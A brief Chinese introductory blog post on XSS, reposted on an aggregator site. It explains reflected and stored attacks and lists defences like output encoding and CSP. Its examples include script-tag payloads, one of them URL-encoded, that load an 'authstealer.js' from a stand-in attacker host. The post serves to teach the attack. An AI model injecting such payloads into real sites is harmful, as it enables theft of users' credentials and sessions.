美文网首页
xss简介

xss简介

作者: 从此以后dapeng | 来源:发表于2017-03-05 23:51 被阅读56次

XSS攻击原理及类型?

原理

在客户端向网页中写入可执行脚本,然后提交给服务器,服务器生成包含该脚本的网页。

非持久性XSS

写入可执行脚本的网页是临时的,脚本信息不会保存到数据库。

网站:search.com
A:发现 search.com?q=XXX页面显示“查询到XXX”
A: 修改 search.com?q=http://bobssite.org?q=dogs%3Cscript%2520src%3D%22http%3A%2F%2Fmallorysevilsite.com%2Fauthstealer.js%22%3E%3C%2Fscript%3E
A: 链接发送给B
B: 访问链接,执行js

持久性XSS

脚本信息会保存到数据库。

网站:comment.com
A: 发表评论‘I love the puppies in this story! They're so cute!<script src="http://mallorysevilsite.com/authstealer.js">’
A: 将包含评论的页面链接发给B
B: 访问链接,执行js

防范措施?

  1. 上下文输出编码/转义字符串输入
  2. 安全验证不受信任的HTML输入
  3. Cookie增加IP验证
  4. 禁用脚本
  5. 使用CSP内容安全策略

相关文章

  • xss简介

    XSS攻击原理及类型? 原理 在客户端向网页中写入可执行脚本,然后提交给服务器,服务器生成包含该脚本的网页。 非持...

  • XSS初识

    XSS简介 ** 要想深入研究XSS,必须要精通JavaScript,JavaScript能做到什么效果,XSS的...

  • web 安全

    一、跨站脚本攻击—XSS 1、XSS - 简介 XSS 是跨站脚本攻击(Cross Site Scripting)...

  • 前端安全[xss]

    XSS[xss] 简介 XSS,全称Cross-site scripting,跨站[1][#fn1]脚本攻击; 不...

  • 前端攻击和防御(一)XSS跨站脚本攻击

    (一)XSS跨站脚本攻击 参考:XSS站脚本攻击 (1)XSS简介 XSS攻击全称跨站脚本攻击(Cross Sit...

  • XSS学习笔记

    一、XSS 简介 XSS(Cross-Site Script,跨站脚本攻击) 攻击方式如下图所示: XSS 攻击根...

  • DVWA之跨站脚本攻击漏洞测试01-反射型XSS

    目录结构 一、XSS概述 1.XSS简介 XSS:跨站脚本攻击(Cross Site Scripting),是一种...

  • dvwa-XSS(DOM)超详细

    XSS 简介 XSS(Cross Site Script),全称跨站脚本攻击,为了与 CSS(Cascading ...

  • 【XSS爬坑之路一】初识XSS

    XSS入门与介绍 1. XSS简介 XSS,跨站脚本攻击(Cross Site Scripting),是一种注入式...

  • XSS_1

    简介: 初学xss,xss分为三类。包括反射型,储存型和基于DOM型 一.XSS使用方法 1.简单XSS 所有代码...

网友评论

      本文标题:xss简介

      本文链接:https://www.haomeiwen.com/subject/ofhygttx.html

      延伸阅读

      深度阅读

      • 您也可以注册成为美文阅读网的作者,发表您的原创作品、分享您的心情!

      栏目导航

      热点阅读

      关于我们|服务条款|联系我们|xss简介|投稿指南|网站地图|RSS订阅|排版工具|手机版

      提供经典美文摘抄,优美散文欣赏,现代诗歌精选,短篇小说,心情随笔,表白情书范文,故事会在线阅读欣赏

      Copyright © 2014-2023 Haomeiwen.com All Rights Reserved. 好美文阅读网 版权所有

      备案信息:桂公网安备 45052102000051号 · 桂ICP备13007215号-3

      本站所收录作品、热点评论等信息部分来源互联网,目的只是为了系统归纳学习和传递资讯

      所有作品版权归原创作者所有,与本站立场无关,如不慎侵犯了你的权益,请联系我们告知,我们将做删除处理!